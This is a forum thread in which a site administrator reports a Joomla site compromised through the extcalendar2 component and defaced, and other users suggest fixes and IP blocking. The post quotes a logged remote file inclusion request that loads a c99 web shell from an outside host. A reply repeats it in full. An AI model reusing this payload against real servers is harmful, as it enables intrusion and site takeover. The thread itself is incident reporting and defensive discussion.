+HACKED+ Through extcalendar2 ???

[dkone]

Hey guys, should this be a warning?? -->HacKeD By TamTurk<--

we got hacked twice last night. We are pretty sure the little fcuk's used extcalendar2 to get a Backdoor.PHP trojan onto the server. And we know what that means, yes,...everything is pretty fcuked. We fixed it but they left yet another little PHPshell (c99shell) hidden deep down,...and thew whole thing started again. Particularly emberassing for our clients as the site got defaced pretty badly with some Islam/Terror stuff,....

We went trough all the logs and actually found out that the stuff slept there for quite a while. Furthermore, we are pretty damn sure the files were placed trough:

.../components/com_extcalendar/admin_events.php

The whole command looked like this:

Code:

.../components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http%3A%2F%2Fsvt.nukleon.us%2Ftools%2Fc99shell.txt%3F&act=ls&d=%2Fweb%2Fsites%2Fuser%2F12%2F&sort=0a"

Also, this php file did not have any defined( '_VALID_MOS' ) line...

We checked out other potential vulnerable scripts as the upload facilities of Docman and ZOOm,...but they are both upload facilities disbaled in the fron-end,..and the files seem secure,...

Any opinions ns

[arnj]

Quote:

Originally Posted by dkone

Hey guys, should this be a warning?? -->HacKeD By TamTurk<--

we got hacked twice last night. We are pretty sure the little fcuk's used extcalendar2 to get a Backdoor.PHP trojan onto the server. And we know what that means, yes,...everything is pretty fcuked. We fixed it but they left yet another little PHPshell (c99shell) hidden deep down,...and thew whole thing started again. Particularly emberassing for our clients as the site got defaced pretty badly with some Islam/Terror stuff,....

We went trough all the logs and actually found out that the stuff slept there for quite a while. Furthermore, we are pretty damn sure the files were placed trough:

.../components/com_extcalendar/admin_events.php

The whole command looked like this:

Code:

.../components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http%3A%2F%2Fsvt.nukleon.us%2Ftools%2Fc99shell.txt%3F&act=ls&d=%2Fweb%2Fsites%2Fuser%2F12%2F&sort=0a"

Also, this php file did not have any defined( '_VALID_MOS' ) line...

We checked out other potential vulnerable scripts as the upload facilities of Docman and ZOOm,...but they are both upload facilities disbaled in the fron-end,..and the files seem secure,...

Any opinions ns

There are known weaknesses in Extcal2 that I saw somewhere on the boards here. You might wanna search for that. In fact, there were fixes issued by the author that I remember.

Plus you got it right with the defined( '_VALID_MOS' ) missing code issue. That alone will help a lot. See my other post on my response to being hacked.

So far, 100% success and the attempts are dwindling. The bastards host their scripts on web sites as well, so be sure to block those sites ip's and, if possible, entire CIDR blocks of the hacker's source IP. See my other post on that.

[dkone]

Cool, thanks man...

I think we got it resolved,...there a fix out,..since about 2 weeks,..from a joomla
team, replacing all the vulnerable files in extcal.

http://forum.joomla.org/index.php?topic=75390.msg389913

Yes, these guys keep hammering the doors,..but sofar everything keeps up. Tmorrow I will look at your other posts,..and start blocking IPranges,...

Cya

dk